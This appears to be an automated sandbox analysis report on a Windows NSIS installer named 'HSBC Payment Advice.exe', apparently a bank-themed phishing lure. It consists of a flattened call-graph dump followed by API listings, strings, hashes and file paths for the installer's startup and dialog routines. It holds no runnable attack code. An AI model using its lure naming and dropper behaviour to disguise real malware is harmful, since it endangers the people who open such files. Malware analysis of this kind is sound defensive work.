4081 402720 4080->4081 4083 405e2f wsprintfW 4081->4083 4083->4078 4091 40427b lstrlenW 4092 40429a 4091->4092 4093 40429c WideCharToMultiByte 4091->4093 4092->4093 4094 402c7d 4095 402ca8 4094->4095 4096 402c8f SetTimer 4094->4096 4097 402cf6 4095->4097 4098 402cfc MulDiv 4095->4098 4096->4095 4099 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 4098->4099 4099->4097 4101 4014ff 4102 401507 4101->4102 4104 40151a 4101->4104 4103 402b1b 18 API calls 4102->4103 4103->4104 4105 401000 4106 401037 BeginPaint GetClientRect 4105->4106 4107 40100c DefWindowProcW 4105->4107 4109 4010f3 4106->4109 4110 401179 4107->4110 4111 401073 CreateBrushIndirect FillRect DeleteObject 4109->4111 4112 4010fc 4109->4112 4111->4109 4113 401102 CreateFontIndirectW 4112->4113 4114 401167 EndPaint 4112->4114 4113->4114 4115 401112 6 API calls 4113->4115 4114->4110 4115->4114 4116 401a00 4117 402b38 18 API calls 4116->4117 4118 401a09 ExpandEnvironmentStringsW 4117->4118 4119 401a1d 4118->4119 4121 401a30 4118->4121 4120 401a22 lstrcmpW 4119->4120 4119->4121 4120->4121 4122 401b01 4123 402b38 18 API calls 4122->4123 4124 401b08 4123->4124 4125 402b1b 18 API calls 4124->4125 4126 401b11 wsprintfW 4125->4126 4127 4029c5 4126->4127 4128 404581 4129 404591 4128->4129 4130 4045b7 4128->4130 4132 40412d 19 API calls 4129->4132 4131 404194 8 API calls 4130->4131 4134 4045c3 4131->4134 4133 40459e SetDlgItemTextW 4132->4133 4133->4130 4135 405106 4136 405116 4135->4136 4137 40512a 4135->4137 4138 40511c 4136->4138 4147 405173 4136->4147 4139 405132 IsWindowVisible 4137->4139 4145 405149 4137->4145 4141 404179 SendMessageW 4138->4141 4142 40513f 4139->4142 4139->4147 4140 405178 CallWindowProcW 4143 405126 4140->4143 4141->4143 4148 404a5c SendMessageW 4142->4148 4145->4140 4153 404adc 4145->4153 4147->4140 4149 404abb SendMessageW 4148->4149 4150 404a7f GetMessagePos ScreenToClient SendMessageW 4148->4150 4151 404ab3 4149->4151 4150->4151 4152 404ab8 4150->4152 4151->4145 4152->4149 4162 405ee8 lstrcpynW 4153->4162 4155 404aef 4163 405e2f wsprintfW 4155->4163 4157 404af9 4158 40140b 2 API calls 4157->4158 4159 404b02 4158->4159 4164 405ee8 lstrcpynW 4159->4164 4161 404b09 4161->4147 4162->4155 4163->4157 4164->4161 4165 401f08 4166 402b38 18 API calls 4165->4166 4167 401f0f GetFileVersionInfoSizeW 4166->4167 4168 401f8c 4167->4168 4169 401f36 GlobalAlloc 4167->4169 4169->4168 4170 401f4a GetFileVersionInfoW 4169->4170 4170->4168 4171 401f59 VerQueryValueW 4170->4171 4171->4168 4172 401f72 4171->4172 4176 405e2f wsprintfW 4172->4176 4174 401f7e 4177 405e2f wsprintfW 4174->4177 4176->4174 4177->4168 4185 404b0e GetDlgItem GetDlgItem 4186 404b60 7 API calls 4185->4186 4192 404d79 4185->4192 4187 404c03 DeleteObject 4186->4187 4188 404bf6 SendMessageW 4186->4188 4189 404c0c 4187->4189 4188->4187 4190 404c43 4189->4190 4195 405f0a 18 API calls 4189->4195 4193 40412d 19 API calls 4190->4193 4191 404e5d 4194 404f09 4191->4194 4200 404d6c 4191->4200 4204 404eb6 SendMessageW 4191->4204 4192->4191 4202 404a5c 5 API calls 4192->4202 4215 404dea 4192->4215 4199 404c57 4193->4199 4196 404f13 SendMessageW 4194->4196 4197 404f1b 4194->4197 4198 404c25 SendMessageW SendMessageW 4195->4198 4196->4197 4207 404f34 4197->4207 4208 404f2d ImageList_Destroy 4197->4208 4216 404f44 4197->4216 4198->4189 4203 40412d 19 API calls 4199->4203 4205 404194 8 API calls 4200->4205 4201 404e4f SendMessageW 4201->4191 4202->4215 4220 404c65 4203->4220 4204->4200 4210 404ecb SendMessageW 4204->4210 4206 4050ff 4205->4206 4211 404f3d GlobalFree 4207->4211 4207->4216 4208->4207 4209 4050b3 4209->4200 4217 4050c5 ShowWindow GetDlgItem ShowWindow 4209->4217 4213 404ede 4210->4213 4211->4216 4212 404d3a GetWindowLongW SetWindowLongW 4214 404d53 4212->4214 4224 404eef SendMessageW 4213->4224 4218 404d71 4214->4218 4219 404d59 ShowWindow 4214->4219 4215->4191 4215->4201 4216->4209 4228 404adc 4 API calls 4216->4228 4232 404f7f 4216->4232 4217->4200 4237 404162 SendMessageW 4218->4237 4236 404162 SendMessageW 4219->4236 4220->4212 4223 404cb5 SendMessageW 4220->4223 4225 404d34 4220->4225 4226 404cf1 SendMessageW 4220->4226 4227 404d02 SendMessageW 4220->4227 4223->4220 4224->4194 4225->4212 4225->4214 4226->4220 4227->4220 4228->4232 4229 405089 InvalidateRect 4229->4209 4230 40509f 4229->4230 4234 404976 21 API calls 4230->4234 4231 404fad SendMessageW 4233 404fc3 4231->4233 4232->4231 4232->4233 4233->4229 4235 405037 SendMessageW SendMessageW 4233->4235 4234->4209 4235->4233 4236->4200 4237->4192 4238 404910 4239 404920 4238->4239 4240 40493c 4238->4240 4249 4056a8 GetDlgItemTextW 4239->4249 4242 404942 SHGetPathFromIDListW 4240->4242 4243 40496f 4240->4243 4245 404959 SendMessageW 4242->4245 4246 404952 4242->4246 4244 40492d SendMessageW 4244->4240 4245->4243 4248 40140b 2 API calls 4246->4248 4248->4245 4249->4244 4250 401491 4251 405192 25 API calls 4250->4251 4252 401498 4251->4252 4253 402293 4254 402b38 18 API calls 4253->4254 4255 4022a2 4254->4255 4256 402b38 18 API calls 4255->4256 4257 4022ab 4256->4257 4258 402b38 18 API calls 4257->4258 4259 4022b5 GetPrivateProfileStringW 4258->4259 4260 401718 4261 402b38 18 API calls 4260->4261 4262 40171f SearchPathW 4261->4262 4263 40173a 4262->4263 4264 401f98 4265 401faa 4264->4265 4275 40205c 4264->4275 4266 402b38 18 API calls 4265->4266 4268 401fb1 4266->4268 4267 401423 25 API calls 4269 402195 4267->4269 4270 402b38 18 API calls 4268->4270 4271 401fba 4270->4271 4272 401fd0 LoadLibraryExW 4271->4272 4273 401fc2 GetModuleHandleW 4271->4273 4274 401fe1 4272->4274 4272->4275 4273->4272 4273->4274 4284 4062be WideCharToMultiByte 4274->4284 4275->4267 4278 401ff2 4281 401423 25 API calls 4278->4281 4282 402002 4278->4282 4279 40202b 4280 405192 25 API calls 4279->4280 4280->4282 4281->4282 4282->4269 4283 40204e FreeLibrary 4282->4283 4283->4269 4285 4062e8 GetProcAddress 4284->4285 4286 401fec 4284->4286 4285->4286 4286->4278 4286->4279 4287 40159b 4288 402b38 18 API calls 4287->4288 4289 4015a2 SetFileAttributesW 4288->4289 4290 4015b4 4289->4290 4291 40149e 4292 40223c 4291->4292 4293 4014ac PostQuitMessage 4291->4293 4293->4292 4294 40219e 4295 402b38 18 API calls 4294->4295 4296 4021a4 4295->4296 4297 402b38 18 API calls 4296->4297 4298 4021ad 4297->4298 4299 402b38 18 API calls 4298->4299 4300 4021b6 4299->4300 4301 40622b 2 API calls 4300->4301 4302 4021bf 4301->4302 4303 4021d0 lstrlenW lstrlenW 4302->4303 4304 4021c3 4302->4304 4306 405192 25 API calls 4303->4306 4305 405192 25 API calls 4304->4305 4308 4021cb 4304->4308 4305->4308 4307 40220e SHFileOperationW 4306->4307 4307->4304 4307->4308 4309 4029a0 SendMessageW 4310 4029c5 4309->4310 4311 4029ba InvalidateRect 4309->4311 4311->4310 4319 401b22 4320 401b73 4319->4320 4321 401b2f 4319->4321 4323 401b78 4320->4323 4324 401b9d GlobalAlloc 4320->4324 4322 402229 4321->4322 4328 401b46 4321->4328 4325 405f0a 18 API calls 4322->4325 4333 401bb8 4323->4333 4340 405ee8 lstrcpynW 4323->4340 4326 405f0a 18 API calls 4324->4326 4327 402236 4325->4327 4326->4333 4334 4056c4 MessageBoxIndirectW 4327->4334 4338 405ee8 lstrcpynW 4328->4338 4331 401b8a GlobalFree 4331->4333 4332 401b55 4339 405ee8 lstrcpynW 4332->4339 4334->4333 4336 401b64 4341 405ee8 lstrcpynW 4336->4341 4338->4332 4339->4336 4340->4331 4341->4333 4342 402222 4343 402229 4342->4343 4345 40223c 4342->4345 4344 405f0a 18 API calls 4343->4344 4346 402236 4344->4346 4347 4056c4 MessageBoxIndirectW 4346->4347 4347->4345 4354 402727 4355 4029c5 4354->4355 4356 40272e 4354->4356 4357 402734 FindClose 4356->4357 4357->4355 4358 401cab 4359 402b1b 18 API calls 4358->4359 4360 401cb2 4359->4360 4361 402b1b 18 API calls 4360->4361 4362 401cba GetDlgItem 4361->4362 4363 4024e6 4362->4363 3196 40232f 3197 402335 3196->3197 3198 402b38 18 API calls 3197->3198 3199 402347 3198->3199 3200 402b38 18 API calls 3199->3200 3201 402351 RegCreateKeyExW 3200->3201 3202 402791 3201->3202 3203 40237b 3201->3203 3204 402396 3203->3204 3205 402b38 18 API calls 3203->3205 3206 4023a2 3204->3206 3208 402b1b 18 API calls 3204->3208 3207 40238c lstrlenW 3205->3207 3209 4023bd RegSetValueExW 3206->3209 3213 403060 3206->3213 3207->3204 3208->3206 3211 4023d3 RegCloseKey 3209->3211 3211->3202 3214 403070 SetFilePointer 3213->3214 3215 40308c 3213->3215 3214->3215 3228 40317b GetTickCount 3215->3228 3218 405bd7 ReadFile 3219 4030ac 3218->3219 3220 40317b 43 API calls 3219->3220 3224 403137 3219->3224 3221 4030c3 3220->3221 3222 40313d ReadFile 3221->3222 3221->3224 3227 4030d3 3221->3227 3222->3224 3224->3209 3225 405bd7 ReadFile 3225->3227 3226 403106 WriteFile 3226->3224 3226->3227 3227->3224 3227->3225 3227->3226 3229 4032e5 3228->3229 3230 4031aa 3228->3230 3232 402d18 33 API calls 3229->3232 3241 40330d SetFilePointer 3230->3241 3237 403093 3232->3237 3233 4031b5 SetFilePointer 3238 4031da 3233->3238 3237->3218 3237->3224 3238->3237 3239 40326f WriteFile 3238->3239 3240 4032c6 SetFilePointer 3238->3240 3242 4032f7 3238->3242 3245 40638e 3238->3245 3252 402d18 3238->3252 3239->3237 3239->3238 3240->3229 3241->3233 3243 405bd7 ReadFile 3242->3243 3244 40330a 3243->3244 3244->3238 3246 4063b3 3245->3246 3247 4063bb 3245->3247 3246->3238 3247->3246 3248 406442 GlobalFree 3247->3248 3249 40644b GlobalAlloc 3247->3249 3250 4064c2 GlobalAlloc 3247->3250 3251 4064b9 GlobalFree 3247->3251 3248->3249 3249->3246 3249->3247 3250->3246 3250->3247 3251->3250 3253 402d41 3252->3253 3254 402d29 3252->3254 3256 402d51 GetTickCount 3253->3256 3257 402d49 3253->3257 3255 402d32 DestroyWindow 3254->3255 3258 402d39 3254->3258 3255->3258 3256->3258 3260 402d5f 3256->3260 3267 40628b 3257->3267 3258->3238 3261 402d94 CreateDialogParamW ShowWindow 3260->3261 3262 402d67 3260->3262 3261->3258 3262->3258 3271 402cfc 3262->3271 3264 402d75 wsprintfW 3265 405192 25 API calls 3264->3265 3266 402d92 3265->3266 3266->3258 3268 4062a8 PeekMessageW 3267->3268 3269 4062b8 3268->3269 3270 40629e DispatchMessageW 3268->3270 3269->3258 3270->3268 3272 402d0b 3271->3272 3273 402d0d MulDiv 3271->3273 3272->3273 3273->3264 4364 4016af 4365 402b38 18 API calls 4364->4365 4366 4016b5 GetFullPathNameW 4365->4366 4367 4016f1 4366->4367 4368 4016cf 4366->4368 4369 4029c5 4367->4369 4370 401706 GetShortPathNameW 4367->4370 4368->4367 4371 40622b 2 API calls 4368->4371 4370->4369 4372 4016e1 4371->4372 4372->4367 4374 405ee8 lstrcpynW 4372->4374 4374->4367 4375 406c30 4378 4063c1 4375->4378 4376 406442 GlobalFree 4377 40644b GlobalAlloc 4376->4377 4377->4378 4379 406d2c 4377->4379 4378->4376 4378->4377 4378->4378 4378->4379 4380 4064c2 GlobalAlloc 4378->4380 4381 4064b9 GlobalFree 4378->4381 4380->4378 4380->4379 4381->4380 4382 4027b3 4383 402b38 18 API calls 4382->4383 4384 4027c1 4383->4384 4385 4027d7 4384->4385 4386 402b38 18 API calls 4384->4386 4387 405b2f 2 API calls 4385->4387 4386->4385 4388 4027dd 4387->4388 4408 405b54 GetFileAttributesW CreateFileW 4388->4408 4390 4027ea 4391 402893 4390->4391 4392 4027f6 GlobalAlloc 4390->4392 4395 40289b DeleteFileW 4391->4395 4396 4028ae 4391->4396 4393 40288a CloseHandle 4392->4393 4394 40280f 4392->4394 4393->4391 4409 40330d SetFilePointer 4394->4409 4395->4396 4398 402815 4399 4032f7 ReadFile 4398->4399 4400 40281e GlobalAlloc 4399->4400 4401 402862 WriteFile GlobalFree 4400->4401 4402 40282e 4400->4402 4404 403060 46 API calls 4401->4404 4403 403060 46 API calls 4402->4403 4407 40283b 4403->4407 4405 402887 4404->4405 4405->4393 4406 402859 GlobalFree 4406->4401 4407->4406 4408->4390 4409->4398 4410 4028b4 4411 402b1b 18 API calls 4410->4411 4412 4028ba 4411->4412 4413 4028f6 4412->4413 4414 4028dd 4412->4414 4415 402791 4412->4415 4416 402900 4413->4416 4417 40290c 4413->4417 4418 4028e2 4414->4418 4423 4028f3 4414->4423 4419 402b1b 18 API calls 4416->4419 4420 405f0a 18 API calls 4417->4420 4424 405ee8 lstrcpynW 4418->4424 4419->4423 4420->4423 4423->4415 4425 405e2f wsprintfW 4423->4425 4424->4415 4425->4415 4426 4014b8 4427 4014be 4426->4427 4428 401389 2 API calls 4427->4428 4429 4014c6 4428->4429 3730 4015b9 3731 402b38 18 API calls 3730->3731 3732 4015c0 3731->3732 3733 4059de 4 API calls 3732->3733 3744 4015c9 3733->3744 3734 401614 3735 401646 3734->3735 3736 401619 3734->3736 3740 401423 25 API calls 3735->3740 3738 401423 25 API calls 3736->3738 3737 405960 CharNextW 3739 4015d7 CreateDirectoryW 3737->3739 3741 401620 3738->3741 3742 4015ed GetLastError 3739->3742 3739->3744 3747 40163e 3740->3747 3748 405ee8 lstrcpynW 3741->3748 3742->3744 3745 4015fa GetFileAttributesW 3742->3745 3744->3734 3744->3737 3745->3744 3746 40162d SetCurrentDirectoryW 3746->3747 3748->3746 4430 401939 4431 402b38 18 API calls 4430->4431 4432 401940 lstrlenW 4431->4432 4433 4024e6 4432->4433 4434 402939 4435 402b1b 18 API calls 4434->4435 4436 40293f 4435->4436 4437 402972 4436->4437 4438 40294d 4436->4438 4439 402791 4436->4439 4437->4439 4440 405f0a 18 API calls 4437->4440 4438->4439 4442 405e2f wsprintfW 4438->4442 4440->4439 4442->4439 4443 40653d 4445 4063c1 4443->4445 4444 406d2c 4445->4444 4446 406442 GlobalFree 4445->4446 4447 40644b GlobalAlloc 4445->4447 4448 4064c2 GlobalAlloc 4445->4448 4449 4064b9 GlobalFree 4445->4449 4446->4447 4447->4444 4447->4445 4448->4444 4448->4445 4449->4448 4450 40173f 4451 402b38 18 API calls 4450->4451 4452 401746 4451->4452 4453 405b83 2 API calls 4452->4453 4454 40174d 4453->4454 4454->4454

          Executed Functions

          Function 00403358 Relevance: 77.3, APIs: 28, Strings: 16, Instructions: 335stringfilecomCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 403358-4033ee #17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW 7 4033f0-4033f7 0->7 8 4033f8-40340a call 405960 CharNextW 0->8 7->8 11 4034d8-4034de 8->11 12 4034e4 11->12 13 40340f-403415 11->13 16 4034f8-403512 GetTempPathW call 403324 12->16 14 403417-40341c 13->14 15 40341e-403424 13->15 14->14 14->15 17 403426-40342a 15->17 18 40342b-40342f 15->18 26 403514-403532 GetWindowsDirectoryW lstrcatW call 403324 16->26 27 40356a-403584 DeleteFileW call 402dba 16->27 17->18 20 403435-40343b 18->20 21 4034c9-4034d4 call 405960 18->21 24 403455-40346c 20->24 25 40343d-403444 20->25 21->11 37 4034d6-4034d7 21->37 33 40349a-4034b0 24->33 34 40346e-403484 24->34 31 403446-403449 25->31 32 40344b 25->32 26->27 42 403534-403564 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403324 26->42 44 40361a-403629 ExitProcess CoUninitialize 27->44 45 40358a-403590 27->45 31->24 31->32 32->24 33->21 36 4034b2-4034c7 33->36 34->33 39 403486-40348e 34->39 36->21 43 4034e6-4034f3 call 405ee8 36->43 37->11 40 403490-403493 39->40 41 403495 39->41 40->33 40->41 41->33 42->27 42->44 43->16 50 403725-40372b 44->50 51 40362f-40363f call 4056c4 ExitProcess 44->51 47 403592-40359d call 405960 45->47 48 40360a-403611 call 4038b2 45->48 65 4035d4-4035de 47->65 66 40359f-4035b0 47->66 60 403616 48->60 53 4037a8-4037b0 50->53 54 40372d-40374a call 406252 * 3 50->54 61 4037b2 53->61 62 4037b6-4037ba ExitProcess 53->62 86 403794-40379f ExitWindowsEx 54->86 87 40374c-40374e 54->87 60->44 61->62 67 4035e0-4035ee call 405a3b 65->67 68 403645-40365f lstrcatW lstrcmpiW 65->68 70 4035b2-4035b4 66->70 67->44 81 4035f0-403606 call 405ee8 * 2 67->81 68->44 71 403661-403677 CreateDirectoryW SetCurrentDirectoryW 68->71 74 4035b6-4035cc 70->74 75 4035ce-4035d2 70->75 76 403684-4036ad call 405ee8 71->76 77 403679-40367f call 405ee8 71->77 74->65 74->75 75->65 75->70 90 4036b2-4036ce call 405f0a DeleteFileW 76->90 77->76 81->48 86->53 91 4037a1-4037a3 call 40140b 86->91 87->86 88 403750-403752 87->88 88->86 92 403754-403766 GetCurrentProcess 88->92 99 4036d0-4036e0 CopyFileW 90->99 100 40370f-403717 90->100 91->53 92->86 101 403768-40378a 92->101 99->100 103 4036e2-403702 call 405d82 call 405f0a call 405663 99->103 100->90 102 403719-403720 call 405d82 100->102 101->86 102->44 103->100 113 403704-40370b CloseHandle 103->113 113->100
          APIs
          • #17.COMCTL32 ref: 00403377
          • SetErrorMode.KERNELBASE(00008001), ref: 00403382
          • OleInitialize.OLE32(00000000), ref: 00403389
            • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
            • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
            • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
          • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
            • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
          • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",00000000), ref: 004033D9
          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",00000020), ref: 00403400
          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
          • DeleteFileW.KERNELBASE(1033), ref: 0040356F
          • ExitProcess.KERNEL32(?), ref: 0040361A
          • CoUninitialize.COMBASE(?), ref: 0040361F
          • ExitProcess.KERNEL32 ref: 0040363F
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\HSBC Payment Advice.exe",00000000,?), ref: 0040364B
          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\HSBC Payment Advice.exe",00000000,?), ref: 00403657
          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
          • DeleteFileW.KERNEL32(0041FE90,0041FE90,?, eremo$,?), ref: 004036C4
          • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
          • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
          • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
          • ExitProcess.KERNEL32 ref: 004037BA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: ExitFileProcess$DirectoryHandlelstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
          • String ID: eremo$$"C:\Users\user\Desktop\HSBC Payment Advice.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
          • API String ID: 2762237255-110307709
          • Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
          • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
          • Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
          • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E
          Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 114 4052d1-4052ec 115 4052f2-4053bb GetDlgItem * 3 call 404162 call 404a2f GetClientRect GetSystemMetrics SendMessageW * 2 114->115 116 40547d-405484 114->116 138 4053d9-4053dc 115->138 139 4053bd-4053d7 SendMessageW * 2 115->139 118 405486-4054a8 GetDlgItem CreateThread CloseHandle 116->118 119 4054ae-4054bb 116->119 118->119 121 4054d9-4054e3 119->121 122 4054bd-4054c3 119->122 123 4054e5-4054eb 121->123 124 405539-40553d 121->124 126 4054c5-4054d4 ShowWindow * 2 call 404162 122->126 127 4054fe-405507 call 404194 122->127 128 405513-405523 ShowWindow 123->128 129 4054ed-4054f9 call 404106 123->129 124->127 132 40553f-405545 124->132 126->121 135 40550c-405510 127->135 136 405533-405534 call 404106 128->136 137 405525-40552e call 405192 128->137 129->127 132->127 140 405547-40555a SendMessageW 132->140 136->124 137->136 143 4053ec-405403 call 40412d 138->143 144 4053de-4053ea SendMessageW 138->144 139->138 145 405560-40558b CreatePopupMenu call 405f0a AppendMenuW 140->145 146 40565c-40565e 140->146 153 405405-405419 ShowWindow 143->153 154 405439-40545a GetDlgItem SendMessageW 143->154 144->143 151 4055a0-4055b5 TrackPopupMenu 145->151 152 40558d-40559d GetWindowRect 145->152 146->135 151->146 155 4055bb-4055d2 151->155 152->151 156 405428 153->156 157 40541b-405426 ShowWindow 153->157 154->146 158 405460-405478 SendMessageW * 2 154->158 159 4055d7-4055f2 SendMessageW 155->159 160 40542e-405434 call 404162 156->160 157->160 158->146 159->159 161 4055f4-405617 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 159->161 160->154 163 405619-405640 SendMessageW 161->163 163->163 164 405642-405656 GlobalUnlock SetClipboardData CloseClipboard 163->164 164->146
          APIs
          • GetDlgItem.USER32(?,00000403), ref: 00405330
          • GetDlgItem.USER32(?,000003EE), ref: 0040533F
          • GetClientRect.USER32(?,?), ref: 0040537C
          • GetSystemMetrics.USER32(00000015), ref: 00405384
          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
          • ShowWindow.USER32(?,00000008), ref: 00405420
          • GetDlgItem.USER32(?,000003EC), ref: 00405441
          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
          • GetDlgItem.USER32(?,000003F8), ref: 0040534E
            • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
          • GetDlgItem.USER32(?,000003EC), ref: 00405493
          • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
          • CloseHandle.KERNELBASE(00000000), ref: 004054A8
          • ShowWindow.USER32(00000000), ref: 004054CC
          • ShowWindow.USER32(?,00000008), ref: 004054D1
          • ShowWindow.USER32(00000008), ref: 0040551B
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
          • CreatePopupMenu.USER32 ref: 00405560
          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
          • GetWindowRect.USER32(?,?), ref: 00405594
          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
          • OpenClipboard.USER32(00000000), ref: 004055F5
          • EmptyClipboard.USER32 ref: 004055FB
          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
          • GlobalLock.KERNEL32(00000000), ref: 00405611
          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
          • GlobalUnlock.KERNEL32(00000000), ref: 00405645
          • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
          • CloseClipboard.USER32 ref: 00405656
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
          • String ID: {
          • API String ID: 590372296-366298937
